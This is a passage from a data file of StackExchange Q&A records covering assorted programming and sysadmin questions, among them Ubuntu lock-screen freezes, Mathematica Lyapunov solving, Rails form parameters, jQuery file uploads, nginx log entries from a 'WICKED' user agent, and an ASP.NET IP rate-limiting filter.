delay time to 3 minutes, I was able to check, now about four or five times, that entering my password re-opened the desktop to where I was, with no freeze-up problem.\nAs a bonus for doing the screen lock automatically, I find that the screen immediately goes black. With the Super-L key it usually (but not always) displays a bright screen with the password-entry-box and the time. And sometimes it stays that way all night.\nComment: did you check journalctl for logs for when the laptop locked and froze up? compare to when it unlocks properly\nAnswer: I have the same problem. It is a very serious problem in my opinion that Canonical must address now. In my case I have to restart the computer randomly because it freezes after some automatic screen locks, it doesn't happen every day but it does happen some days. In my opinion it happens more when I have a Snap application like Firefox open, so it is probably a problem with Snap and one of its applications. I have read in some forum that a user solved the problem by installing Firefox from deb packages after Snap. I am going to watch and monitor some of the snap processes. Other users relate it to AMD GPU drivers. I'm still paying attention to this thread.\nAnswer: I faced a similar problem - my lock screen would turn black after I pressed a button or moved the mouse to show the password field, and would remain black until I pressed a key or moved the mouse again. Firefox snap wasn't running, but was installed, so I removed it and the problem disappeared\nAnswer: I face the same issue, on 3 different computers (all upgraded from Ubuntu 20.04).\nI found at least a workaround: use Ctrl+Alt+F1 then Ctrl+Alt+F2. It should bring you again on the login screen. You type the password again, and you're back in your session.\nHowever, it's only a workaround.\nI've found https:\/\/bugs.launchpad.net\/ubuntu\/+source\/gnome-shell\/+bug\/1975884 that describes the same symptoms, but I do not always have his error message in my \/var\/log\/syslog\nAnswer: I locked my desktop via Super+L. Nothing in the above advice was helpful. All that blind-typing my password achieved was to bring up a blank desktop with no app icons or status bar, and nothing to do except reboot. Ctrl+Alt+F1 then Ctrl+Alt+F2 didn't seem to do anything useful. Ctrl+Alt+F2 has on occasion brought up a bare command prompt login that I do not have the expertise to do anything useful with.\nComment: As it's currently written, your answer is unclear. Please [edit] to add additional details that will help others understand how this addresses the question asked. You can find more information on how to write good answers [in the help center](\/help\/how-to-answer).\nComment: If you have a new question, please ask it by clicking the [Ask Question](https:\/\/askubuntu.com\/questions\/ask) button. Include a link to this question if it helps provide context. - [From Review](\/review\/late-answers\/1259759)\n","meta":{"source":"askubuntu","title":"Ubuntu 22.04.01: freeze-ups on refreshing from locked screen","dup_signals":{}},"subset":"stackexchange"} +{"text":"Matrix Solve for a particular form\n\nQuestion: Suppose that we have two matrices $\\mathbf A$ and $\\mathbf B$ which are known to us and both of them are square matrices of the same dimensions.\nNow we want to find a square matrix $\\mathbf C$ that solves following equation:\n$$\\mathbf C=\\mathbf A\\mathbf C\\mathbf A^\\top+\\mathbf B$$\nHow can we find this $\\mathbf C$ matrix in Mathematica?\nJust for additional information, it is for finding the state-space unconditional covariance matrix\nThanks\nAnswer: <code>LyapunovSolve[]<\/code> is designed for this:\n<code>amat = Array[a, {2, 2}]; bmat = Array[b, {2, 2}];\ncmat = LyapunovSolve[{amat, -IdentityMatrix[Length[amat]]},\n {IdentityMatrix[Length[amat]], Transpose[amat]}, -bmat];\n<\/code>\nCheck:\n<code>amat.cmat.Transpose[amat] + bmat - cmat \/\/ Simplify\n {{0, 0}, {0, 0}}\n<\/code>\n\nAlternatively, you can reformulate as a Kronecker product linear system:\n<code>cmat2 = Partition[LinearSolve[KroneckerProduct[amat, amat] - \n IdentityMatrix[Length[amat]^2],\n -Flatten[bmat]], Length[amat]];\n<\/code>\nCheck:\n<code>amat.cmat2.Transpose[amat] + bmat - cmat2 \/\/ Simplify\n {{0, 0}, {0, 0}}\n<\/code>\nComment: Thanks for your help. I checked Mathematica documentation and you are right. I should use `LyapunovSolve[]`, but since it is a discrete version, I should use `DiscreteLyapunovSolve[]`.\n","meta":{"source":"mathematica.stackexchange","title":"Matrix Solve for a particular form","dup_signals":{}},"subset":"stackexchange"} +{"text":"Facebook stating my app short dynamic link as against community standards\n\nQuestion: I have a mobile app that people can share a link to it on Facebook and it's has been fine for months. But in the last few days, when people share the short dynamic (deep) link that is configured in Firebase dynamic links, Facebook says it goes against community standards. \nHowever, if I post the long deep link (not the short) on Facebook, it works fine. I used the Facebook share debugger to see what could be the problem. If I put the short deep link, it says \"the website contains a blocked URL\" and nothing more (no other info or meta data). Even though, the links that the deep link converts to are the app on play and app store, and for the web it's the web page that shows a description of the app and has been the same all the time while the share was working fine (the web page url only shows a warning to include some missing properties in page and not a blocked URL on Facebook share debugger, same message as with working long dynamic link). \nSo how can I figure out the real problem? Many thanks.\nAnswer: Found the problem. It was the image preview URL in the dynamic link. For some reason, the hosted link was considered as a suspicious URL even though in was hosted on a trusted site and works on other platforms.\nAnswer: have you used deferred deep link in facebook ads ?\nComment: This does not answer the question\n","meta":{"source":"stackoverflow","title":"Facebook stating my app short dynamic link as against community standards","dup_signals":{}},"subset":"stackexchange"} +{"text":"1 parameter not saving on create\n\nQuestion: I have a 'parent_id' which is successfully passed as parameter into a form page (\"Create Child\") here :\n<code><li><%= link_to \"Create Child\", new_block_path(:parent_id => @block.id)%><\/li>\n<\/code>\nLogging the parameter gives :\n<code>Started GET \"\/blocks\/new?parent_id=7\" for ::1 at 2022-10-31 22:01:05 +0000\nProcessing by BlocksController#new as HTML\n Parameters: {\"parent_id\"=>\"7\"}\n<\/code>\nI then have a form which calls a <code>create<\/code> method here :\n<code>def create\n @block = Block.new(block_params)\n\n if @block.save\n redirect_to @block\n else\n render :new, status: :unprocessable_entity\n end\n end\n<\/code>\nusing these block_params\n<code>private \n def block_params\n params.require(:block).permit(:title, :body, :parent_id)\n end\n end\n<\/code>\nBut when I call the create function only :title and :body are present.\nPrinting the parameters shows :\n<code>Started POST \"\/blocks\" for ::1 at 2022-10-31 22:01:17 +0000\nProcessing by BlocksController#create as TURBO_STREAM\nParameters: {\"authenticity_token\"=>\"[FILTERED]\", \n\"block\"=>{\"title\"=>\"this is a child of block 7\", \n\"body\"=>\"this is a child of block 7\"}, \"commit\"=>\"Create Block\"}\n<\/code>\nFiltered shows <code>:title<\/code> and <code>:body<\/code> are permitted correctly, but the URL parameter of <code>parent_id<\/code> has just vanished.\nThe rails guide states : \"Submitted form data is put into the params Hash, alongside captured route parameters\" - I just can't work this out. The parent_id parameter is there as it should be when the form is loaded, but when submitted it vanishes.\nAnswer: There are two actions, <code>new<\/code> and <code>create<\/code>, you could think they are separate.\nSo params from <code>new<\/code> won't be available in <code>create<\/code> automatically (in your case <code>parent_id<\/code>), you have to pass the params explicitly.\nYou could just add a hidden input in your form to pass <code>parent_id<\/code>:\n<code><%= form_with model: @block do |f| %>\n <%= f.hidden_field :paren_id, value: params[:parent_id] %>\n <%= f.text_field :title %>\n <%= f.text_field :body %>\n<% end %>\n\n<\/code>\n","meta":{"source":"stackoverflow","title":"1 parameter not saving on create","dup_signals":{}},"subset":"stackexchange"} +{"text":"Selenium with Java - Unable to create a loop for a drop down\n\nQuestion: I could not manage to select the next drop down item through the locator of the selected item. My intention is to test a site for different languages through the drop down. Sending keyboard down arrow activates the scroll bar in the drop down. Could anyone please help on this ? \n<code>driver.findElement(By.xpath(\".\/\/*[@id='trigger']\/div\/paper-input\/paper-input-container\")).click();\n Thread.sleep(1000);\n driver.findElement(By.xpath(\".\/\/*[@id='langList']\/\/paper-item\/\/.[@tabindex=\\\"0\\\"]\")).click();\n Thread.sleep(1000);\n driver.findElement(By.xpath(\".\/\/*[@id='langList']\/\/paper-item\/\/.[@tabindex=\\\"0\\\"]\")).sendKeys(Keys.ENTER, Keys.ARROW_DOWN);\n<\/code>\nAnswer: I was going to write out some examples, but remembered Dave Haeffner had already covered this in his elemental selenium series. \nYou can find the great write-up of that here:\nHow To Select from a Dropdown in Selenium\nI will mention one thing though. You should make a great effort at never using implicit waits (Thread.sleep()). They do not make for clear exception errors unless they are handled well, and will slow down your tests greatly. Identify what you are waiting on, and create an explicit wait. If you need more information on creating those, I can go into more detail.\nAnswer: Thanks a lot. It works now with the following code:\n<code>driver.findElement(By.xpath(\".\/\/*[@id='trigger']\/div\/paper-input\/paper-input-container\")).click();\n Thread.sleep(1000);\n driver.findElement(By.cssSelector(\".style-scope.making-language-selector.iron-selected.x-scope.paper-item-0\")).click();\n\n driver.findElement(By.cssSelector(\".style-scope.making-language-selector.iron-selected.x-scope.paper-item-0\")).sendKeys(Keys.ARROW_DOWN, Keys.ENTER);\n<\/code>\nComment: StackOverflow really needs to change the rep needed to add comments lower than 50.\n","meta":{"source":"stackoverflow","title":"Selenium with Java - Unable to create a loop for a drop down","dup_signals":{}},"subset":"stackexchange"} +{"text":"Applying Aspect Oriented Programming\n\nQuestion: I've been using some basic AOP style solutions for cross-cutting concerns like security, logging, validation, etc. My solution has revolved around Castle Windsor and DynamicProxy because I can apply everything using a Boo based DSL and keep my code clean of Attributes. I was told at the weekend to have a look at PostSharp as it's supposed to be a \"better\" solution. I've had a quick look at PostSharp, but I've been put off by the Attribute usage.\nHas anyone tried both solutions and would care to share their experiences?\nAnswer: Couple of minor issues with PostSharp...\nOne issue I've had with PostSharp is that whilst using asp.net, line numbers for exception messages are 'out' by the number of IL instructions injected into asssemblies by PostSharp as the PDBs aren't injected as well :-).\nAlso, without the PostSharp assemblies available at runtime, runtime errors occur. Using Windsor, the cross-cuts can be turned off at a later date without a recompile of code.\n(hope this makes sense)\nComment: This is a pretty old answer that I stumbled across, but I just wanted to note that PostSharp does now actually transform the PDB files, so the debugging issue is no more (see: http:\/\/stackoverflow.com\/questions\/2006508\/postsharp-pdb-debugging-and-referenced-assemblies)\nAnswer: I only looked at castle-windsor for a short time (yet) so I can't comment on that but I did use postsharp.\nPostsharp works by weaving at compile time. It ads a post-compile step to your build where it modifies your code. The code is compiled as if you just programmed the cross cutting concerns into you code. This is a bit more performant than runtime weaving and because of the use of attributes Postsharp is very easy to use. I think using attributes for AOP isn't as problematic as using it for DI. But that's just my personal taste.\nBut...\nIf you already use castle for dependency injection I don't see a good reason why you shouldn't also use it for AOP stuff. I think though the AOP at runtime is a bit slower than at compile time it's also more powerful. AOP and DI are in my opinion related concepts so I think it's a good idea to use one framework for both. So I'll probably look at the castle stuff again next project I need AOP.\n","meta":{"source":"stackoverflow","title":"Applying Aspect Oriented Programming","dup_signals":{}},"subset":"stackexchange"} +{"text":"\"WICKED\" entries in the default nginx vhost's logs\n\nQuestion: I have a small VPS running nginx, and for a long time now (several months, since I rented it) it has been collecting weird entries in its default (listen 80 default;) vhost's logs: \n<code>109.x.x.121 - - [07\/Dec\/2012:07:42:43 +0100] \"GET \/webpanel\/gate.php HTTP\/1.1\" 404 168 \"-\" \"WICKED\"\n<\/code>\nthere is a lot of those, from a few different IPs\n<code># grep WICKED \/var\/log\/nginx\/x.access.log | awk '{print $1}' | sort | uniq | wc -l\n18\n<\/code>\nThere are also recurring ones, like this one which polls the server every minute \n<code>95.x.x.4 - - [07\/Dec\/2012:08:17:35 +0100] \"-\" 400 0 \"-\" \"-\"\n95.x.x.4 - - [07\/Dec\/2012:08:18:37 +0100] \"-\" 400 0 \"-\" \"-\"\n95.x.x.4 - - [07\/Dec\/2012:08:19:39 +0100] \"-\" 400 0 \"-\" \"-\"\n<\/code>\nuntil it stops. According to its PTR and whois information, this particular IP belongs to a dynip range of some German cable company so it's probably not a monitoring service. \nNow, here's my question, what am I looking at?\nWas the IP being used in some sort of bot herding before I got it? Or maybe my server was compromised? Those entries were showing up when I only had sshd and nginx serving static sites so pretty much nothing to exploit. \nEDIT: yeah, I inflated the numbers unwittingly because I forgot to sort, fixed. \nComment: We must perform an exorcism to cleanse these WICKED NUMBERS!\nAnswer: The last two fields by default are the referrer and user agent fields (nginx reference). Normally you'd see something there like a browser (Mozilla), search bot (Googlebot), command line program (\"Wget\", \"curl\") etc. there. Whoever is running something against your server is using \"WICKED\" as a user agent string.\nComment: And I'd also point out that this means nothing specific. Just someone decided to call their program \"WICKED\"; that's really all you can conclude directly.\nComment: Yup, could be custom-made, could be a regular browser with a custom user agent. No telling.\n","meta":{"source":"security.stackexchange","title":"\"WICKED\" entries in the default nginx vhost's logs","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to correctly send a form data with text and file input fields?\n\nQuestion: I am having a problem with sending a form with both text and file fields. I can choose from : \n1) sending customized request with specified fields\n<code>$(\"#form_new_product\").submit(function(event){\nevent.preventDefault();\n if ( product_name ) { \n $.post( \n '\/product\/create',\n { product_name: product_name,\n product_description: product_description\n \/\/ file : file ???\n }) \n .fail(function(res){\n alert(\"Error: \" + res.getResponseHeader(\"error\"));\n }) \n .done(function(res){\n showInfoAlert(\"Product : \\\"\" + product_name + \"\\\" has been added to catalog.\");\n }); \n }\n}\n<\/code>\nbut this way I cannot specify the file (file.path) to be uploaded - that's what being passed with <code>files<\/code> field of POST request (any idea how to do it ?)\n2) post the 'normal'\/not customized form fields but I am not sure how to do it with ajax in jquery (to use methods from above snippet <code>showInfoAlert<\/code> and <code>showErrorAlert<\/code> to indicate response status)\nComment: do you want to support IE8 and IE9?\nAnswer: An excellent way to handle this, since you're using jQuery anyway, is the jQuery Form plugin: http:\/\/malsup.com\/jquery\/form\/. It's widely used, free of any major bugs as far as I've ever seen (been using it for many months), easy to implement.\nComment: It looks nice but I cannot understand how can I join text and file fields to put in one POST request.\nComment: @Patryk just add more `` next to the file input, or before, in the same form, with this plugin you can just `$('#form_new_product').ajaxSubmit({success: ..., error: ...})` and it will submit ALL the fields, the text and file types as well. see my answer below for an example\nComment: It didn't answer the question\nAnswer: First off, make sure you name your form inputs correctly, that will make your life easier\n \n \n \n \n \nIf you do not wish to support IE8\/9 for your ajax upload you can use the following:\n<code>\/\/ FormData is not supported by ie8 and 9 as far as I know\n\/\/ and some others see here: http:\/\/caniuse.com\/#search=FormData \n\/\/ you can check for FormData support by something like this\nvar supportFormData = function(){\n return !! window.FormData;\n};\n\n $('#form_new_product').submit(function(e) {\n e.preventDefault();\n var form;\n\n \/\/ you can pass in your form element here if you have the <input> tags named correctly, like this:\n form = new FormData($(\"#form_new_product\").eq(0)) \/\/ that's the easiest way\n\n \/\/ or you can create a FormData object and append stuff to it\n form = new FormData();\n \/\/ signature --> form.append(input[name], input[value])\n form.append('product_name', $('#form_new_product input[name=\"product_name\"]').val());\n form.append('product_description', $('#form_new_productinput[name=\"product_description\"]').val());\n \/\/ now a file input,\n form.append('product_image', $('#form_new_product input[type=\"file\"]').eq(0).files[0], 'image.png'\/*optional*\/);\n\n return $.ajax({\n url: '\/path\/to\/form\/action',\n type: 'POST',\n data: form,\n mimeType:'multipart\/form-data\",\n contentType: false,\n cache: false,\n processData: false\n )\n .done(function(response){\n \/\/ handle success\n })\n .fail(function(response){\n \/\/ handle error\n });\n});\n<\/code>\nIf you want to support IE8 and IE9, you may need to do some little tweaking server side as well,\nand your submitForm function won't be as simple as the previous one, I would suggest using http:\/\/malsup.com\/jquery\/form\/\nlike some of the other answers did, but as the plugin mentions, here\nthe server response header MUST be <code>text\/html<\/code> so IE8 won't trigger a file download for a JSON response (assuming you are expecting a JSON response) - basically this plugin is creating an iFrame with a form in it and submits it to the server for you. There is other solution than the <code>text\/html<\/code> like wrapping the response with a <code><textarea><\/code>, check that last link I mentioned.\nSo, assuming you are using this plugin, here's I would do it.\n<code>var isIE = function () {\n var myNav = navigator.userAgent.toLowerCase();\n return (myNav.indexOf('msie') != -1) ? parseInt(myNav.split('msie')[1]) : false;\n}\n\n$('#form_new_product').submit(function(e) {\n e.preventDefault();\n var $form = $(\"#form_new_product\");\n\n var options = {\n url: '\/path\/to\/form\/action',\n type: \"POST\",\n mimeType: \"multipart\/form-data\"\n };\n\n \/\/ hack because IE lt 9 iFrame triggers a file download for a application\/json response\n \/\/ http:\/\/stackoverflow.com\/questions\/17701992\/ie-iframe-doesnt-handle-application-json-response-properly\n if (Reporting.util.isIE() <= 9) {\n \/\/ maybe you have another contract with the server, like a custom query string or whatever\n \/\/ but the server needs to return text\/html\n options.ContentType = \"text\/html\";\n }\n\n \/\/ don't think this returns a promise, so you can use the options.success and options.error like that\n options.success = function(response){\n \/\/ handle success\n };\n options.error = function(response){\n \/\/ handle error\n };\n\n \/\/ or you really want to return a promise, then you can \n var deferred = new $.Deferred();\n options.success(function(response){\n deferred.resolve(response);\n });\n options.error(function(response){\n deferred.reject(response);\n })\n\n \/\/ this will submit all of your inputs\n form.ajaxSubmit(options);\n return deferred;\n}); \n<\/code>\nAnswer: You can't send file field without user's confirmation.\nUser has to fill the field by hand.\nIf it's ok for you, you can read this page which will explain how to do it ;-)\nComment: User is going to fill the field by hand. I have a file input widget from http:\/\/jasny.github.io\/bootstrap\/javascript\/#fileinput.\n","meta":{"source":"stackoverflow","title":"How to correctly send a form data with text and file input fields?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Installing vendor library using composer\n\nQuestion: I'm trying to use the https:\/\/github.com\/webonyx\/graphql-php\/ library to make graphql requests.\nBut for some reason it doesn't work, and I can't figure out why.\nI'm using this command to install:\n<code>composer require webonyx\/graphql-php\n<\/code>\nVendor folder with content + <code>composer.json<\/code> \/ <code>composer.lock<\/code> appear in the project folder.\nWhen I try a simple code like:\n<code><?php\n\nrequire_once 'vendor\/autoload.php';\n\nuse GraphQL\\Client;\nuse GraphQL\\Query;\n\n\/\/ Replace with your actual GraphQL endpoint and API key\n$graphqlEndpoint = 'https:\/\/platformurl';\n\n\/\/ Set up the GraphQL client\n$client = new Client($graphqlEndpoint);\n\n?>\n<\/code>\n\nFatal error: Uncaught Error: Class \"GraphQL\\Client\" not found in\n\/url\/test.php:14 Stack trace: #0 {main} thrown in \/url\/test.php on\nline 14\n\nWhen I check composer.json it contains this:\n<code>{\n \"require\": {\n \"webonyx\/graphql-php\": \"^15.7\"\n }\n}\n<\/code>\nI tried <code>composer install<\/code> or <code>update<\/code>.\nI tried a <code>require<\/code> with the direct link to graphql folder.\nBut there is no difference.\nI found that there was no src\/client.php file in the graphql-php library folder, but I don't know if this is necessary or how that comes (chatGPT said this is the reason why it doesn't works)..\nPHP Version is PHP 8+. What could be the reason?\nComment: \"it doesn't work\" - what does that mean? If installing the package works, are oyu sure this problem is related to Composer after all?\nAnswer: If your useing autoload after adding new class you should run composer dump-autoload to cached list of classes\nAnswer: As you have seen, there is no <code>GraphQL\\Client<\/code> (or <code>Query<\/code>) classes. Wherever you got the \"simple code\" from is not how the package is used. I suggest looking in the examples directory and other documentation in the repository to see how it can actually be used.\nAnswer: I understand you have the php file in the <code>src<\/code> folder. Change the path to the <code>vendor<\/code> folder\n<code>- vendor\n- src\n-- client.php\n<\/code>\n<code>require __DIR__ . '\/..\/vendor\/autoload.php';\n<\/code>\n","meta":{"source":"stackoverflow","title":"Installing vendor library using composer","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can I stop a slick-slider from auto rotate?\n\nQuestion: I wanna stop a slick-slider from auto rotating. I do not have the code but need to overwrite it.\n<code><slick-slider>\n <slick-list>\n <slick-track>\n\n <slick-slide>\n <\/slick-slide>\n <slick-slide>\n <\/slick-slide>\n\n <slick-track>\n <slick-list>\n<slick-slider>\n<\/code>\nAnswer: Make the autoplay: false\nHTML \n<code><div class=\"slider autoplay\">\n <div><h3>1<\/h3><\/div>\n <div><h3>2<\/h3><\/div>\n <div><h3>3<\/h3><\/div>\n<\/div>\n<\/code>\nJquery \n<code>$('.autoplay').on('init', function(slick) {\n$('.slick-dots').on('click',function() {\n $('.autoplay').slick('slickPause');\n});\n}).slick({\n slidesToShow: 3,\n slidesToScroll: 1,\n dots: true,\n autoplay: false,\n autoplaySpeed: 2000,\n})\n<\/code>\nmake sure you have linked the slick and jquery.\n","meta":{"source":"stackoverflow","title":"How can I stop a slick-slider from auto rotate?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Blocking dangerous IPs for accessing a resource\n\nQuestion: \nEnvironment\nMy IIS host an WebApp with WebService resources.\n\n...\nmyWebService.asmx\nmyWebService.svc\n...\n\nProblem\nSame bad guys, try to block server accessing the public resources with theirs bots.\nApplied solution\n\nI Build a filter:\n\n<code>public class BadGuysFilter\n{\n private class BadGuy\n {\n public BadGuy()\n {\n Visits = 0;\n FirstSuspiciousVisit = DateTime.Now;\n }\n\n public int Visits;\n public DateTime FirstSuspiciousVisit;\n }\n\n private static volatile Dictionary<string, BadGuy> _blackList = new Dictionary<string, BadGuy>();\n private static int _visitsLimit = 10;\n private static int _minutsLimit = 10;\n private static int _removeFromBlackListMinutesLimit = 30;\n\n public static void Init(int visitsLimit = 10, int minutsLimit = 10, int removeFromBlackListMinutesLimit = 30)\n {\n _visitsLimit = visitsLimit;\n _minutsLimit = minutsLimit;\n _removeFromBlackListMinutesLimit = removeFromBlackListMinutesLimit;\n }\n\n public static bool IsBadGuy()\n {\n return IsBadGuy(HttpContext.Current.Request.UserHostAddress);\n }\n public static bool IsBadGuy(string ip)\n {\n if (HttpContext.Current.Request.IsAuthenticated \/*|| HttpContext.Current.Request.HttpMethod.ToUpper() == \"POST\"*\/)\n return false;\n\n if (_blackList.Keys.Any(k => k == ip))\n {\n _blackList[ip].Visits++;\n\n if (_blackList[ip].FirstSuspiciousVisit < DateTime.Now.AddMinutes(-_removeFromBlackListMinutesLimit))\n _blackList.Remove(ip);\n else if (_blackList[ip].FirstSuspiciousVisit < DateTime.Now.AddMinutes(-_minutsLimit))\n {\n _blackList[ip].Visits = 0;\n _blackList[ip].FirstSuspiciousVisit = DateTime.Now;\n }\n else if (_blackList[ip].Visits > _visitsLimit)\n {\n _blackList[ip].FirstSuspiciousVisit = DateTime.Now;\n return true;\n }\n }\n else\n _blackList.Add(ip, new BadGuy());\n\n return false;\n }\n public static void Punish()\n {\n var res = HttpContext.Current.Response;\n res.Clear();\n res.StatusCode = 429;\n res.StatusDescription = \"TOO MANY REQUESTS: Your application is sending too many simultaneous requests.\";\n res.End();\n }\n}\n<\/code>\nUse filter in Global.asax\n\n<code>void Application_BeginRequest(object sender, EventArgs e) {\n if(BadGuysFilter.IsBadGuy())\n BadGuysFilter.Punish();\n\n \/\/ do stuff \/\/\n}\n\nvoid Application_EndRequest(object sender, EventArgs e) {\n var app = (HttpApplication)sender;\n\n if (app.Context.Response.StatusCode == 429) \/\/ \"TOO MANY REQUESTS\"\n return;\n\n \/\/ do stuff \/\/\n}\n<\/code>\n\nQuestion\nIs this an enough safe solution? Or maybe there is another way?\nEdite:\n\"don't block at the resource itself. block farther upstream, e.g. at the firewall. \u2013 Marc B\"\nYes, you're right. This is final solution, but before apply it i need intermediate solution to defend my server. I forgot to mention this thing. \u2013 Artiom\nComment: don't block at the resource itself. block farther upstream, e.g. at the firewall.\nComment: as @MarcB says, this solution is going to tie up IIS resources for every blocked request, which is not going to help if they're doing DDOS attack.\nComment: Yes, you're right. This is final solution, but before apply it i need intermediate solution to defend my server. I forgot to mention this thing.\nAnswer: You can use IIS Dynamic IP restriction module (from Microsoft):\nhttp:\/\/www.iis.net\/downloads\/microsoft\/dynamic-ip-restrictions\nAnswer: I agree with the comments above. You need to block ddos further upstream otherwise you application is still going to be servicing each request. \nThis type of approach appears to lack any persistence. Therefore, when they bombard your system and you recycle the app pools, it will reset. On the other hand, the firewall apprach lacks the flexibility to remove after a certain time...I think.\nThat said, if you need to handle suspicious requests of a different nature such as too many request to the login page but not the home page or something then this could be a viable solution.\nIt is really just considering all of your goals and understanding the risks and limitations.\n","meta":{"source":"stackoverflow","title":"Blocking dangerous IPs for accessing a resource","dup_signals":{}},"subset":"stackexchange"} +{"text":"Stored Procedure Performance Tuning\n\nQuestion: I got project where I need to do improve performance of the application. To improve performance I have did following changes in the application & sql Stored procedure:\n\nI have replaced all temp tables to sub-queries in the stored procedure \nCalling SP once instead of calling multiple times do to insert multiple parameters to table one by one. (Note: created XML file with all parameters data and sent to new Stored procedure where I am doing insert parameters data to table using cursor)\n\nAm I doing\/following right way?\nAnswer: Something you should take note of; If you are linking any tables in your select, be sure to use JOINS instead of selects inside selects, this may seem like a minor thing to do, but this type of change could cut your procedure's run time in half.\nAnswer: Replacing temp. tables with subqueries can actually make the performance worse, because that can cause the same statement to be executed hundreds of times, instead of filling the temp table once.\nAlso blindly just removing procedure calls and replacing it with XML handling and cursor can be a big step backwards.\nInstead of asking us if this is the correct thing, you should really measure it.\nAnd in addition to that, you should look into the normal places for performance tuning:\n\nIndexing: Look at statistics io output for selected queries or plan cache for overall I\/O usage\nBlocking: If something is blocking your statements, you should definitely see if there's something that can be done\nExpensive operations in query plans: Sorts, Spools, key lookups with large number of executions.\nAnswer: Performnce tuning Link\nShow Execution Plan\nhttps:\/\/statisticsparser.com\/\nSET Statistics IO,TIME ON in query and copy paste the messages from output window to https:\/\/statisticsparser.com\/ in readable format.\n\nCreate Non- Clustered Index for all Columns that are used in Where\nClause\nAdd SET NOCOUNT ON\nAdd With No Lock on all tables used in Query\nAdd Non Clustered With Include for all columns in where clause\nDo not include functions in Join or in Where Clause\nCTE instead of SubQuery\nSelect only required columns\n","meta":{"source":"stackoverflow","title":"Stored Procedure Performance Tuning","dup_signals":{}},"subset":"stackexchange"} +{"text":"How do I update to Ubuntu 12.04 if update manager doesn't prompt it?\n\nQuestion: I was updating to Ubuntu 12.04 and I lost my wireless connection. I turned off my computer and got to a better connection and now my \"Update Manager\" does not prompt for the upgrade.\nComment: You were in the middle of the upgrade process?\nComment: Yes, it had already started downloading for at least an hour...\nComment: What is the output of `lsb_release -a`?\nAnswer: Make sure that all possible updates are installed using update-manager.\nAfter that you can trigger the update-manager with the dist-upgrade option which should start it showing the upgrade option to 12.04.\nDo it like this:\n\nPress Alt+F2\nType \"update-manager --dist-upgrade\" and press enter\n\nIf that doesn't work it might be that all your repositories are already changed to the new distribution. You just need to finalize the installation:\n\nPress Alt+F2\nType \"gnome-terminal\" and press enter\nIn the terminal window type \"sudo apt-get update; sudo apt-get upgrade\"\nEnter your password when prompted\nAccept the proposed update\n\nPlease let us know if one of these ways worked for you.\nComment: When I tried it the first way, it says \"Your system is up to date\"\n\nWhen I tried it the second way it just said 0 upgraded.\n\nWhat happened was it was partially installed and when my internet connection got lost, it said it would save what had been upgraded so far.\nAnswer: Try <code>sudo apt-get dist-upgrade<\/code>; if your system is fully updated before you type that, it SHOULD upgrade to the newer version.\nUh, good luck; this usually works, but not every time.\nComment: no, `sudo apt-get dist-upgrade` does not upgrade Ubuntu to a higher version. See http:\/\/manpages.ubuntu.com\/manpages\/precise\/en\/man8\/apt-get.8.html\n","meta":{"source":"askubuntu","title":"How do I update to Ubuntu 12.04 if update manager doesn't prompt it?","dup_signals":{}},"subset":"stackexchange"} +{"text":"calling a page with ajax based on url parameter\n\nQuestion: please can anyone help me with this problem that i've encountered. i'm able to capture a url parameter with javascript and i want to add it to my jquery code which calls a page in a div but i'm able to do it. here's my code:\n<code><script type=\"text\/javascript\" src=\"http:\/\/ajax.googleapis.com\/ajax\/libs\/jquery\/1.7\/jquery.min.js\"><\/script>\n<script language=\"javascript\" type=\"text\/javascript\">\n function urlink()\n {\n var tlink = window.location.search.substring(1);\n }\n\n jQuery(function($){\n $('#mydiv').load('real_news.asp?'+ urllink());\n });\n<\/script>\n<\/code>\nComment: Your function does not _return_ anything, so trying to concatenate its return value (most likely just _undefined_) with something else is rather pointless.\nAnswer: <code><script type=\"text\/javascript\" src=\"http:\/\/ajax.googleapis.com\/ajax\/libs\/jquery\/1.7\/jquery.min.js\"><\/script>\n<script language=\"javascript\" type=\"text\/javascript\">\n function urlink()\n {\n return window.location.search.substring(1);\n }\n\n jQuery(function($){\n $('#mydiv').load('real_news.asp?'+ urllink());\n });\n<\/script>\n<\/code>\nComment: now i'm able to pass the parameter. but the problem is the page doesn't load the page unless i refresh, any idea about how to make it work.\n","meta":{"source":"stackoverflow","title":"calling a page with ajax based on url parameter","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to get pylint and black working together in VSCode?\n\nQuestion: I've been trying to get pylint and black working together on VSCode without success.\nI can get either one working but only if the other isn't (i.e. black will format but nothing will be reported by pylint, or pylint will report errors but running 'Format Code' does nothing).\nHere's my setttings.json:\n<code>{\n \"editor.formatOnSave\": true,\n \"editor.formatOnPaste\": false,\n \"editor.formatOnType\": false,\n \"python.pythonPath\": \"\/usr\/bin\/python3\",\n \"python.linting.pylintEnabled\": true,\n \"python.linting.pylintPath\": \"\/usr\/bin\/pylint-3\",\n \"python.linting.flake8Enabled\": false,\n \"python.linting.flake8Path\": \"\/usr\/bin\/flake8-3\",\n \"python.formatting.provider\": \"black\",\n \"python.formatting.blackPath\": \"\/usr\/bin\/black\",\n \"python.formatting.blackArgs\": [\n \"--line-length=110\"\n ],\n \"python.unitTest.pyTestEnabled\": true,\n \"workbench.colorTheme\": \"Default Light+\",\n \"workbench.settings.editor\": \"json\",\n \"python.linting.enabled\": true\n}\n<\/code>\nEnvironment:\n\nFedora 29\nVSCode 1.28.2\nPython extension 2018.9.2\npylint 2.1.1\nblack 18.6b4\nComment: any success getting this to work?\nAnswer: I've tried this before no success. Neither did <code>flake8<\/code> + <code>autopep8<\/code> if my memory serves me right. And now I won't even be able to install the two of them in the same <code>pipenv<\/code> virtual environment due to some dependency conflicts. If you are interested you can examine the output below.\nCurrently, I use <code>pylint<\/code>+<code>autopep8<\/code> (default by VS Code) and if you would like to stick with <code>black<\/code> I guess you need to switch your linter to something else.\n<code>\/\/ I have pylint installed already\n\u279c pipenv install --dev autopep8 \nInstalling autopep8\u2026\nAdding autopep8 to Pipfile's [dev-packages]\u2026\n\u2714 Installation Succeeded \nPipfile.lock (3830f9) out of date, updating to (6cacd5)\u2026\nLocking [dev-packages] dependencies\u2026\n\u2718 Locking Failed! \n[pipenv.exceptions.ResolutionFailure]: File \"\/home\/xzhan\/miniconda3\/lib\/python3.7\/site-packages\/pipenv\/resolver.py\", line 69, in resolve\n[pipenv.exceptions.ResolutionFailure]: req_dir=requirements_dir\n[pipenv.exceptions.ResolutionFailure]: File \"\/home\/xzhan\/miniconda3\/lib\/python3.7\/site-packages\/pipenv\/utils.py\", line 726, in 